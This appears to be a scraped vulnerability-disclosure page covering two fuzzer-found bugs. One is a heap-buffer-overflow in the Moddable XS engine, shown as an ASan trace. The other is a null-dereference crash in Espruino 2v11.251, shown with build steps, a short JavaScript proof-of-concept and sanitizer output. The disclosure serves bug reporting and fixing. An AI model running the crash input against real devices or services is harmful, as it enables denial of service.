    #1 0x564bd7f19243 in memcpy /usr/include/x86\_64-linux-gnu/bits/string\_fortified.h:34
    #2 0x564bd7f19243 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1989
    #3 0x564bd7e46db6 in fx\_RegExp\_prototype\_replace /root/moddable/xs/sources/xsRegExp.c:834
    #4 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #5 0x564bd7f1c334 in fx\_String\_prototype\_withRegexp /root/moddable/xs/sources/xsString.c:1675
    #6 0x564bd7f1c334 in fx\_String\_prototype\_replace /root/moddable/xs/sources/xsString.c:1120
    #7 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842
    #8 0x564bd7ebcc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766
    #9 0x564bd80ce90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387
    #10 0x564bd79f54c7 in main /root/moddable/xs/tools/xst.c:281
    #11 0x7f62e01eebf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #12 0x564bd79f70c9 in \_start (/root/moddable/build/bin/lin/debug/xst+0x950c9)

0x7f62dd0fe820 is located 0 bytes to the right of 16777248-byte region \[0x7f62dc0fe800,0x7f62dd0fe820)
allocated by thread T0 here:
    #0 0x7f62e0c59b40 in \_\_interceptor\_malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x564bd7d2fa66 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506
    #2 0x564bd7d630a3 in fxAllocate /root/moddable/xs/sources/xsMemory.c:170
    #3 0x564bd7a19d9a in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1367
    #4 0x564bd79f2ddf in main /root/moddable/xs/tools/xst.c:259
    #5 0x7f62e01eebf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x79779)
Shadow bytes around the buggy address:
  0x0fecdba17cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fecdba17cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0fecdba17d00: 00 00 00 00\[fa\]fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fecdba17d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

Credits: Found by OWL337 team.

mkellner pushed a commit that referenced this issue

Dec 21, 2021

![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=88&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4)

Copy link

Collaborator

**![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=60&u=215e33360b9ddfee4db978bab8a275a39972aa9f&v=4) **phoddie** commented Dec 21, 2021**

Nice find. We have eliminated several other integer overflow issues recently, but clearly overlooked this one.

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46328: Heap-buffer-overflow in __libc_start_main · Issue #751 · Moddable-OpenSource/moddable

Espruino 2v11.251 was discovered to contain a SEGV vulnerability via src/jsinteractive.c in jsiGetDeviceFromClass.

**Espruino revision**

Commit: 53108085  
Version: 2v11.251

**Build environment**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CCFLAGS='\-g -fsanitize=address -fno-omit-frame-pointer'
make clean && make

**Test case**

function JSEtest(v, i) {
    if (i \=== 1) {
        return v \=== 12;
    }
    return false;
}

var obj \= {
    length: 2
};
var h \= 11;

Object.defineProperty(obj, "1", {
    get: Serial1.setup,
    set: function (args) {
        h \= args;
    },
    configurable: true
});

Object.defineProperty(obj, "0", {
    get: obj\[1\],
    configurable: true
});

assert(Array.prototype.some.call(obj, JSEtest));

**Execution & Output**

./Espruino/espruino poc.js

ASAN:DEADLYSIGNAL 
=================================================================
=========ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x564b36989594 bp 0x7ffddbd07060 sp 0x7ffddbd07060 T0)
=========The signal is caused by a READ memory access.
=====Hint: address points to the zero page.
#0 0x564b36989593 in jsiGetDeviceFromClass src/jsinteractive.c:100
#1 0x564b36e1e10c in jswrap\_serial\_setup src/jswrap\_serial.c:283
#2 0x564b36948eee in jsnCallFunction src/jsnative.c:223
#3 0x564b3695a983 in jspeFunctionCall src/jsparse.c:609
#4 0x564b36981d1e in jspExecuteFunction src/jsparse.c:3044
#5 0x564b3687d2ce in jsvExecuteGetter src/jsvar.c:1965
#6 0x564b3687ec87 in jsvSkipNameWithParent src/jsvar.c:2199
#7 0x564b3687f34d in jsvSkipName src/jsvar.c:2212
#8 0x564b3687f34d in jsvSkipNameAndUnLock src/jsvar.c:2244
#9 0x564b3697cb58 in jspeFactorObject src/jsparse.c:1261
#10 0x564b36979ed2 in jspeFactor src/jsparse.c:1673
#11 0x564b3695c91f in jspeFactorFunctionCall src/jsparse.c:1160
#12 0x564b3695df38 in jspePostfixExpression src/jsparse.c:1786
#13 0x564b36959436 in jspeBinaryExpression src/jsparse.c:1955
#14 0x564b36959436 in jspeConditionalExpression src/jsparse.c:1991
#15 0x564b36959436 in jspeAssignmentExpression src/jsparse.c:2050
#16 0x564b36959436 in jspeFunctionCall src/jsparse.c:578
#17 0x564b3695cbd2 in jspeFactorFunctionCall src/jsparse.c:1184
#18 0x564b3695df38 in jspePostfixExpression src/jsparse.c:1786
#19 0x564b3696183e in jspeBinaryExpression src/jsparse.c:1955
#20 0x564b3696183e in jspeConditionalExpression src/jsparse.c:1991
#21 0x564b3696183e in jspeAssignmentExpression src/jsparse.c:2050
#22 0x564b3696183e in jspeExpression src/jsparse.c:2056
#23 0x564b3696f6d4 in jspeBlockOrStatement src/jsparse.c:2124
#24 0x564b36971a1e in jspParse src/jsparse.c:2136
#25 0x564b369803ea in jspEvaluateVar src/jsparse.c:2996
#26 0x564b369803ea in jspEvaluate src/jsparse.c:3026
#27 0x564b36790025 in main targets/linux/main.c:460
#28 0x7f5e1f196bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
#29 0x564b36793bc9 in \_start (/root/Espruino/espruino+0x4ebc9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsinteractive.c:100 in jsiGetDeviceFromClass

Tag

#ubuntu